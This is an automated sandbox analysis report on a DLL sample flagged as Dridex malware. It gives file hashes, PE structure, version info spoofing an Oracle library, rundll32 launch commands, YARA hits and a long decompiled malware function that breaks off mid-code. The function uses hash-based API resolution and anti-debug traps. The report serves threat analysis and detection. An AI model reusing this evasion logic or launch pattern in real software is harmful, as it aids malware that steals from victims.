Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.7.5.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBCC.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4698
Entropy (8bit):	4.489200641127041
Encrypted:	false
SSDEEP:	48:cvIwSD8zsyJgtWI9syWSC8Ba8fm8M4JCdsDIhFU8+q8/Q2Bu4SrSEd:uITfArTSNlJlN8VdDWEd
MD5:	3DD484F1C22DE35EF496E0D108A2144B
SHA1:	A4B75D58E1C7AB93E0BC23D596566BEFDD3705C1
SHA-256:	F2071FB8027F8AAB76A231E60A7E7CD1535975AFF6E19F1FE9ECDCA02930B56A
SHA-512:	34A2535839C897BFE5FE086D00BAB22326877C306620E26AFB8FC2FEEEB7C45A00E98A765A51381F7565EAC3488262274459EEF62D39A83C1B5BC846AF771437
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1310012" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.279967674722502
Encrypted:	false
SSDEEP:	12288:J6qDtK4adayZdIep01Tt8KEPZTaNRu6H58oZkTDeJjd5kLd8Xe:EutK4adayZdIepMt+az
MD5:	1BBE68F4295DC4AD19C0BB363451D431
SHA1:	5F2D7EB58C594163EB7D901DCF9668C3BCA551F3
SHA-256:	0D231027E39BED35782A9A246624B0FCDBBF785447B76ED668048A6890C8CD52
SHA-512:	648F88E3A167434A410E9D93B3405A833CD24359DBF14D0CB053F6108B16247F3C62F14103A86668C9F8B6CC8CDDC185FD02F147058401D92FF28042BEF68944
Malicious:	false
Reputation:	low
Preview:	regfW...W...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmn]...................................................................................................................................................................................................................................................................................................................................................).L........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	4.1178310120760155
Encrypted:	false
SSDEEP:	384:IYIgJ53ETxxk2Ru3cvYBno9SaP5SpafYtx+ygkhBzpfjLjQOA6XadM9xfc:IfgX3uxkSu36YBYSaPspafYtIygcfj3z
MD5:	26311DD3580FAA8C84B9DEC9826A55E3
SHA1:	9449469942F4AA525FD37CD4C3740E79E7DDFD18
SHA-256:	0041A6249B9EC43981E4E6C7314FB5FC7F45E451B2553CC4F1D5424D3C111F06
SHA-512:	2C3EBFD2CA53CDAF2A69EE80C8CBDADC5C663452501550D0D9EC9718DC6FD1E03DD74269D71B28AE24F0394EC61C917A65CAA433784A9E21DDEB677DF863FCCB
Malicious:	false
Reputation:	low
Preview:	regfV...V...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmn]...................................................................................................................................................................................................................................................................................................................................................).LHvLE.^......V.............RD.zE....G.^R.................0......................hbin................p.\..,..........nk,........................................ ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ............ ...........8~.............. .......Z.......................Root........lf......Root....nk ....................................... ...............*...............DeviceCensus.......................vk..................WritePermissions

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.2202707172455005
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll
File size:	565248
MD5:	9d86b7a93411bd7cc5c68b4f49709c27
SHA1:	199faa9305b8a1f6645c07098990ac62da6a7d4d
SHA256:	03d956e36d96255794c7999c52cbc3ea5fc6ec52193a0a3db40e7fb1414b6219
SHA512:	35b7a39d10f5d570355065737264eeb469833d6a6526cc77da0d88144aea28381d81ec13e3afe5cdedfb0dcf1464847ee886c3bcefcf687c93cf5b7cc4b4c3e9
SSDEEP:	12288:znYoMi8KFy86zc86boq67oy6zq86xoG6V2C6FoE69oI6Vo8mHo06zo8knoz5fU56:ziI0+2OJIjTR
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004cd0
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C34004 [Wed Dec 22 15:11:00 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	6c630f89c340001062a2ada6a2273a4d

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
jmp 00007F5FB0F57311h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push ebx
push esi
and esp, FFFFFFF8h
sub esp, 00000080h
mov eax, dword ptr [ebp+08h]
mov ecx, 113CF852h
xor edx, edx
mov esi, dword ptr [esp+78h]
mov edi, esi
xor edi, 0342D826h
mov dword ptr [esp+78h], edi
mov byte ptr [esp+77h], 00000043h
mov dword ptr [esp+64h], 113CF852h
mov word ptr [esp+4Ah], FE51h
mov dword ptr [esp+34h], eax
mov dword ptr [esp+30h], ecx
mov dword ptr [esp+2Ch], edx
mov dword ptr [esp+28h], esi
call 00007F5FB0F5ABC3h
mov ecx, eax
mov edx, eax
mov esi, dword ptr [eax+3Ch]
mov edi, eax
add edi, esi
mov ebx, dword ptr [esp+68h]
mov dword ptr [esp+24h], eax
mov eax, dword ptr [esp+00h]

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x80f49	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x80fac	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x89000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0x1174	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x66be	0x7000	False	0.380964006696	data	4.37724235459	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x7916e	0x7a000	False	0.28338322874	data	7.33164589989	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x82000	0x696e	0x5000	False	0.247509765625	data	5.01040935971	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x89000	0x2f0	0x1000	False	0.09033203125	data	0.788492020975	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0x1baf	0x2000	False	0.242309570312	data	4.16996433109	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x89060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
WINSPOOL.DRV	EnumFormsW
KERNEL32.dll	IsDebuggerPresent, GetModuleHandleW, GetModuleFileNameW, CloseHandle, GetFileSize, OutputDebugStringA
WS2_32.dll	WSACleanup
ADVAPI32.dll	QueryServiceStatusEx, AccessCheck, RegCloseKey
USER32.dll	GetWindowTextA

Version Infos

Description	Data
OriginalFilename	Iha.dll
FileDescription	Oracle Call Interface
FileVersion	2.3.7.0.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 1112 Parent PID: 4260

General

Start time:	00:21:15
Start date:	23/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll"
Imagebase:	0x1210000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5040 Parent PID: 1112

General

Start time:	00:21:15
Start date:	23/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1
Imagebase:	0x870000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1752 Parent PID: 5040

General

Start time:	00:21:15
Start date:	23/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1
Imagebase:	0x320000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.259712771.000000006E861000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.261876126.000000006E861000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.296373547.000000006E861000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6184 Parent PID: 1752

General

Start time:	00:21:20
Start date:	23/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 684
Imagebase:	0x160000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 1112 Parent PID: 4260 loaddll32.exeCOMMON

Executed Functions

Function 6E870730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6E870730(void* __ecx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6e87d1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6E87361C(0x30);
					 *0x6e87d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6E873698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6E87306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6e87d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6E870FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6e87d1f8 + 0xb)) = _t162;
					_t363 = E6E87306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6e87d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6E870730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6e87bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6E86F584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6E86F828(_t429 + 0x24, E6E86F4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6E86F4BC(_t429 + 0x24, E6E86F4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6E875580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6E86F654(_t429 + 0x20);
							E6E8755B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6E875864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6E86DFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6E8755B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6E875864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6E86DFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6E8755B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6E875864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6E86DFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6E86CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6E875558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6E86CFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6E875558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6E86CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6E875558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6E86CFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6E875558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6E86CFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6E875558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6E86CFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6E875558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6e87d1f8 + 0x24)) = _t189;
							_t190 = E6E871030(0xffffffffffffffff);
							_t320 =  *0x6e87d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6e87d1f8 + 0x2c)) = E6E8710A4(0x6e87d1f8, 0xffffffffffffffff);
								L78:
								if(E6E87306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6e87d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6E87306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6e87d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6E8735F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6E87306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6E8735F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6E86F584(_t429 + 0x18c, _t206);
								_t411 = E6E87306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6E86F654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6E86F4BC(_t429 + 0x18c, 0);
								_t213 = E6E86F4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6E8735F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6E86F4BC(_t429 + 0x18c, 0);
								E6E86DF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6E87306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6E86DFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6E87306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6E86E06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6E874FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6E86E8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6E86DFA4(_t429 + 0x1b8);
								E6E86DFA4(_t429 + 0x1b0);
								E6E86F654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E86BB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6e87d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E86BB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6E8735F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6E87306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6E8735F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
